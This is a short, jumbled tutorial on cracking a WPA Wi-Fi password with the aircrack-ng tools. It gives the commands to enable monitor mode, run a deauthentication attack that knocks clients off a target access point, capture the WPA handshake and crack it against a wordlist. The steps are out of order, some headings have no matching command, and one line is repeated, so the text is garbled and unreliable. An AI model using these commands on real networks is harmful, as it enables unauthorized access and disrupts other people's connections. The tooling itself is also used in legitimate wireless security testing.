sudo airmon-ng Kill interfering processes:
sudo airodump-ng wlan0mon Note the (MAC of target AP), CH (channel), and ESSID (network name). 3. Focus on the Target AP Start a targeted capture to a file:
Restore network services:
sudo airmon-ng check kill Start monitor mode on the interface (e.g., wlan0):
sudo airodump-ng --bssid <AP_MAC> -c <channel> -w capture wlan0mon Replace <AP_MAC> and <channel> accordingly. The output files will begin with capture-01.cap . If no client is actively connecting, force reauthentication using aireplay-ng (deauthentication attack): aircrack-ng handshake
sudo aireplay-ng --deauth 5 -a <AP_MAC> wlan0mon This sends 5 deauth packets to broadcast, disconnecting connected clients. Upon reconnection, the 4-way handshake occurs. In the airodump-ng window, watch the top-right corner. When a handshake is captured, you’ll see:
aircrack-ng -w wordlist.txt capture-01.cap The output files will begin with capture-01
WPA handshake: <AP_MAC> The .cap file now contains the handshake. Press Ctrl+C to stop airodump-ng . To verify the handshake explicitly: